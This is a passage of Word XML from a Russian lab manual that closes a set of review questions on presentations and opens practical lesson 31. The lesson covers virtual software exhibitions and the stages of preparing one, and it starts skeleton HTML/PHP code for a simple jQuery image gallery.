        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Как привлечь внимание аудитории?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какой стиль одежды является наиболее приемлемым?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Как заставить аудиторию запомнить основную мысль презентации?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Что такое презентация?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. С помощью каких программных средств можно создавать презентации?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="00B4722D">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Какие мультимедийные элементы можно использовать в презентациях?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B4722D" w:rsidRPr="00617AC0" w:rsidRDefault="00B4722D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00DB3FFC" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="212" w:name="_Toc26278750"/>
      <w:bookmarkStart w:id="213" w:name="_Toc507788271"/>
      <w:bookmarkStart w:id="214" w:name="_Toc507788546"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № </w:t>
      </w:r>
      <w:r w:rsidR="00CF0A98" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Разработка проекта электронной выставки </w:t>
      </w:r>
      <w:r w:rsidR="00CF0A98" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">отраслевого </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>программного обеспечения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
      <w:bookmarkEnd w:id="214"/>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidR="00885449" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков продвижения программного обеспечения.</w:t>
      </w:r>
      <w:r w:rsidR="00885449" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Разработка проекта электронной выставки программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оборудование:</w:t>
      </w:r>
      <w:r w:rsidR="00885449" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Виртуальные выставки: определение, требования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Виртуальная книжная выставка – это публичная демонстрация в сети Интернет с помощью средств веб-технологий виртуальных образов специально подобранных и систематизированных произведений печати и других носителей информации, а также общедоступных электронных ресурсов, рекомендуемых удаленным пользователям библиотеки для обозрения, ознакомления и использования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Достоинства виртуальных выставок:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использование информационных технологий. Динамический синтез текста, изображения, звука – вс</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> это делает виртуальную выставку живой и динамичной.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Использование Интернет. Нет ограничения местом и временем. Появляется возможность дистанционного знакомства с выставкой как массово, так и в порядке индивидуального обращения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Массовость. На обозрение может быть представлено бо́льшее количество книг.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вариативность. Способность к обновлению, дополнению и адаптации информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Экономичность. Электронные выставки экономят место. Нет необходимости работать со стеллажами, стендами, выставочными шкафами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Алгоритм подготовки и организации электронной книжной выставки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Этапы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I Разработка модели электронной книжной выставки. Выберите тему вашей электронной выставки. Проанализируйте, какой материал будет вам необходим для организации выставки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подберите необходимые вам материалы и иллюстрации. Составьте схему выставки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>II Техническая подготовка проекта. Проведите сканирование иллюстраций, подготовьте текстовые материалы. Создайте на диске отдельную папку, в которой будут храниться ваши предварительные материалы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>III Оформление работ в формате PowerPoint. Создайте слайды презентации. Проиллюстрируйте слайды, используя подготовленные материалы, а также эффекты анимации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проведите предварительный просмотр выставки. Исправьте замеченные вами недостатки. Подготовьте электронную выставку к показу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IV Проведение презентации или публикация проекта в Интернете Публикация в Интернете</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Первым делом создаем костяк галереи - выставки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;div id=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>container</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;div id=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>heading</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; &lt;!-- </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Заголовок</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;h1&gt;A cool jQuery gallery&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;div id=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gallery</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; &lt;!-- это блок для изображений --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//здесь идет PHP код</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;div class=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clear</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&lt;/div&gt; &lt;!-- using clearfix --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;div id=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>footer</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; &lt;!-- </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>футер</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/div&gt; &lt;!-- закрывающий div --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Идея очень проста - PHP скрипт будет сканировать папку на наличие изображений. После этого эти изображения с помощью CSS &amp; jQuery будут превращаться в красивую галерею. Пользоваться подобной галерей очень просто - достаточно только загрузить картинки в папку и результат сразу будет виден на странице.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$directory = 'gallery'; //название папки с изображениями</w:t>
      </w:r>
    </w:p>
